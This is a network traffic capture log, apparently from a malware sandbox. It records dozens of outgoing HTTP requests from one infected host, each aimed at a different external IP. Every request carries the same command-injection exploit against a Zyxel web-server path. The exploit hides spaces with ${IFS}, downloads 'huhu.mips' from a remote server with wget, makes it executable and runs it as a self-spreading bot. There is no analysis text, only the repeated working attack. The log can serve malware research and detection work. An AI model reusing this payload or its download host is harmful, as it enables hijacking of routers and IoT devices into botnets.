                                      Jan 19, 2024 17:29:53.190494061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9634192.168.2.145992483.95.131.91443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.190510988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9635192.168.2.1458646193.197.54.217443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.190550089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9636192.168.2.1451438199.222.243.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.190610886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9637192.168.2.1453324186.175.172.171443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.190655947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9638192.168.2.1452028142.139.242.118443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.190699100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9639192.168.2.145780618.129.45.208443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.190740108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9640192.168.2.1445042105.166.82.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.190793037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9641192.168.2.1439062165.45.21.161443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.190826893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9642192.168.2.143984677.119.182.185443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.190857887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9643192.168.2.145594846.142.95.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.190887928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9644192.168.2.144065438.88.228.36443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.190913916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9645192.168.2.1442738209.49.227.133443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.190973997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9646192.168.2.143472859.12.98.77443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.191010952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9647192.168.2.1444768207.252.97.131443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.191040039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9648192.168.2.1434856183.252.144.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.191088915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9649192.168.2.1436298200.30.122.28443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.191127062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9650192.168.2.1448316107.59.137.141443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.191158056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9651192.168.2.1452040147.209.86.105443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.191195965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9652192.168.2.145024054.250.93.194443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.191236973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9653192.168.2.1450670173.16.125.22443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.191298962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9654192.168.2.1450390219.179.219.209443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.191339016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9655192.168.2.1450986117.173.109.220443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.191366911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9656192.168.2.1437464117.29.96.220443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.191431999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9657192.168.2.143907434.111.38.167443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.191442013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9658192.168.2.1437408183.38.94.154443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.191489935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9659192.168.2.1459260206.108.89.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.195218086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9660192.168.2.1440220112.114.143.145443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.195252895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9661192.168.2.1460726190.3.248.178443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:54.203108072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9662192.168.2.1460980177.18.2.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:54.203152895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9663192.168.2.1459760199.181.23.16443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:54.203181982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9664192.168.2.1440274113.14.76.151443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:54.203233004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9665192.168.2.143960075.21.40.132443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:54.203284025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9666192.168.2.1449456177.50.117.179443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:54.203310013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9667192.168.2.1458422106.72.46.59443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:54.203355074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9668192.168.2.1459792146.76.126.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:54.203388929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9669192.168.2.1446518196.8.50.144443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:54.203418016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9670192.168.2.145654268.200.176.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:54.203444958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9671192.168.2.1442700213.123.104.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:54.203514099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9672192.168.2.143454034.253.105.83443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:54.203543901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9673192.168.2.143694284.252.115.103443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:54.203593016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9674192.168.2.14440289.6.86.119443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:54.203622103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9675192.168.2.1433984125.78.49.74443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:54.203659058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9676192.168.2.144598846.68.126.223443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:54.203686953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9677192.168.2.1438002145.148.116.248443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:54.203728914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9678192.168.2.145466664.215.113.39443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:54.203752041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9679192.168.2.144232240.192.143.64443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:54.203773975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9680192.168.2.1435972156.14.166.165443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:54.203824043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9681192.168.2.1438820156.189.141.96443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:54.203903913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9682192.168.2.1450250175.163.75.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:54.203958988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9683192.168.2.145347477.241.87.224443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:54.203984976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9684192.168.2.144602494.83.238.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:54.204031944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9685192.168.2.1448068131.93.36.27443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:54.204081059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9686192.168.2.1434770186.69.139.116443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:54.204109907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9687192.168.2.143831254.6.152.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:54.204132080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9688192.168.2.1439850188.41.163.222443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:54.204168081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9689192.168.2.1456454217.154.173.78443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:54.204216957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9690192.168.2.144684294.83.220.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:54.204240084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9691192.168.2.1454366197.248.63.118443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:54.204277992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9692192.168.2.1436884106.223.222.140443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:54.204305887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9693192.168.2.144134096.61.183.134443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:54.204368114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9694192.168.2.145285684.108.48.230443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:54.204425097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9695192.168.2.1454468218.197.180.209443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:54.204432011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9696192.168.2.144165438.104.114.201443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:54.204469919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9697192.168.2.1454552218.76.252.98443
                                      TimestampBytes transferredDirectionData
